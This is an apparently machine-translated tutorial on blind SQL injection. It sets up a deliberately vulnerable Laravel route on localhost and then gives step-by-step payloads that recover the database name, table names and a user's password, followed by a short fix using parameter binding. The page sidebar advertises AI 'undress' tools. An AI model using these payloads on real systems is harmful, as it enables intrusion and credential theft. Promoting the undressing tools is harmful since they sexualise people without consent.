PHP Framework
Laravel
Parsing SQL blind injection principles through laravel vulnerability examples
Parsing SQL blind injection principles through laravel vulnerability examples
This article brings you relevant knowledge about laravel, which mainly introduces how to explain the principle of SQL blind injection by creating a laravel vulnerability. The so-called blind injection means that there is no error response from the server. Let’s take a look at the injection attack completed when displaying. I hope it will be helpful to everyone.
[Related recommendations: laravel video tutorial】
Environment
composer create-project laravel/laravel lar9 // 安装laravel9 // 编辑.env 修改为DEBUG=false 配置数据库 DEBUG=false DB_HOST=.... php artisan migrate php artisan serve // 启动 // 插入数据 insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
Create vulnerability
// routes/web.php
Route::get('/', function () {
$id = request()->id;
$user = \App\Models\User::whereRaw('id = '.$id)->first();
return $user->name ?? '';
});
// 最后转换的sql是: select * from users where id = $idTest
http://127.0.0.1:8000/?id=1' // 500 http://127.0.0.1:8000/?id=1 and 1=2 // select * from users where id = 1 and 1=2; 返回空 http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh
Steps
Database name
Guess Find the length of the data name
url: http://127.0.0.1:8000/?id=1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 2 // 一直循环下去
Guess the database name
从第一步 知道了数据库名长度 `select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直循环下去 找到数据库名的第一个做字符 然后找第二个字符 直到找完数据库名的长度
Finally: laravel_project
Table name
The following steps and guessing The database is almost the same, so I’ll just talk about it briefly.
information_schema
information_schema comes with mysql.
The database name, table name, column type, etc. are all recorded. Guess the table fields need to be obtained from this database. Come.
Guess the number of tables in laravel_project
url: http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5 mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct"; +----------+ | count(*) | +----------+ | 5 | +----------+
Guess the length of the first table name
With [guess the data name Length] This is not much.
Guess the first table name
url: http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f' mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1; +------------------------+ | substr(table_name,1,1) | +------------------------+ | f | +------------------------+ // 得出第一个表的第一个字段是f 然后查第
Finally the first table name is: failed_jobs
Guess the field
The same logic as guessing the table.
select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; // fail_jobs字段总数
Guess the data
Data This is the most important thing.
Because failed_jobs has no data, I changed it to users.
users has a password field.
mysql> select substr((select password from users limit 0,1),1,1); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,1) | +----------------------------------------------------+ | w | +----------------------------------------------------+ 得出第一个是w,存起来,最后判断 mysql> select substr((select password from users limit 0,1),1,2); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,2) | +----------------------------------------------------+ | wo | +----------------------------------------------------+ 第二个值为o 用第一个值 + 第二个值作为盲注
......
Defense
(Sometimes where does not meet the needs, you need whereRaw)
If necessary, remember Just bind it.
Route::get('/', function () {
$id = request()->id;
$user = \App\Models\User::whereRaw('id = ?',[$id])->first();
return $user->name ?? '';
});As long as you use the framework safely, there will be no loopholes.
Those old projects are full of loopholes.
In this era, it is difficult to find loopholes.
Ps
For the sake of simplicity, the simplest search is used above.
Manual blind injection should use binary search.
select * from users where id = 1 and substr(database(),1,1) ='a'; 换成二分: select * from users where id = 1 and ascii(substr(database(),1,1)) > 99;
It is best to use the tool sqlmap to scan it out directly.
[Related recommendations: laravel video tutorial]
The above is the detailed content of Parsing SQL blind injection principles through laravel vulnerability examples. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
PHP vs. Flutter: The best choice for mobile development
May 06, 2024 pm 10:45 PM
PHP and Flutter are popular technologies for mobile development. Flutter excels in cross-platform capabilities, performance and user interface, and is suitable for applications that require high performance, cross-platform and customized UI. PHP is suitable for server-side applications with lower performance and not cross-platform.
How to use object-relational mapping (ORM) in PHP to simplify database operations?
May 07, 2024 am 08:39 AM
Database operations in PHP are simplified using ORM, which maps objects into relational databases. EloquentORM in Laravel allows you to interact with the database using object-oriented syntax. You can use ORM by defining model classes, using Eloquent methods, or building a blog system in practice.
Analysis of the advantages and disadvantages of PHP unit testing tools
May 06, 2024 pm 10:51 PM
PHP unit testing tool analysis: PHPUnit: suitable for large projects, provides comprehensive functionality and is easy to install, but may be verbose and slow. PHPUnitWrapper: suitable for small projects, easy to use, optimized for Lumen/Laravel, but has limited functionality, does not provide code coverage analysis, and has limited community support.
Laravel - Artisan Commands
Aug 27, 2024 am 10:51 AM
Laravel - Artisan Commands - Laravel 5.7 comes with new way of treating and testing new commands. It includes a new feature of testing artisan commands and the demonstration is mentioned below ?
Comparison of the latest versions of Laravel and CodeIgniter
Jun 05, 2024 pm 05:29 PM
The latest versions of Laravel 9 and CodeIgniter 4 provide updated features and improvements. Laravel9 adopts MVC architecture and provides functions such as database migration, authentication and template engine. CodeIgniter4 uses HMVC architecture to provide routing, ORM and caching. In terms of performance, Laravel9's service provider-based design pattern and CodeIgniter4's lightweight framework give it excellent performance. In practical applications, Laravel9 is suitable for complex projects that require flexibility and powerful functions, while CodeIgniter4 is suitable for rapid development and small applications.
How do the data processing capabilities in Laravel and CodeIgniter compare?
Jun 01, 2024 pm 01:34 PM
Compare the data processing capabilities of Laravel and CodeIgniter: ORM: Laravel uses EloquentORM, which provides class-object relational mapping, while CodeIgniter uses ActiveRecord to represent the database model as a subclass of PHP classes. Query builder: Laravel has a flexible chained query API, while CodeIgniter’s query builder is simpler and array-based. Data validation: Laravel provides a Validator class that supports custom validation rules, while CodeIgniter has less built-in validation functions and requires manual coding of custom rules. Practical case: User registration example shows Lar
PHP code unit testing and integration testing
May 07, 2024 am 08:00 AM
PHP Unit and Integration Testing Guide Unit Testing: Focus on a single unit of code or function and use PHPUnit to create test case classes for verification. Integration testing: Pay attention to how multiple code units work together, and use PHPUnit's setUp() and tearDown() methods to set up and clean up the test environment. Practical case: Use PHPUnit to perform unit and integration testing in Laravel applications, including creating databases, starting servers, and writing test code.
Which one is more beginner-friendly, Laravel or CodeIgniter?
Jun 05, 2024 pm 07:50 PM
For beginners, CodeIgniter has a gentler learning curve and fewer features, but covers basic needs. Laravel offers a wider feature set but has a slightly steeper learning curve. In terms of performance, both Laravel and CodeIgniter perform well. Laravel has more extensive documentation and active community support, while CodeIgniter is simpler, lightweight, and has strong security features. In the practical case of building a blogging application, Laravel's EloquentORM simplifies data manipulation, while CodeIgniter requires more manual configuration.
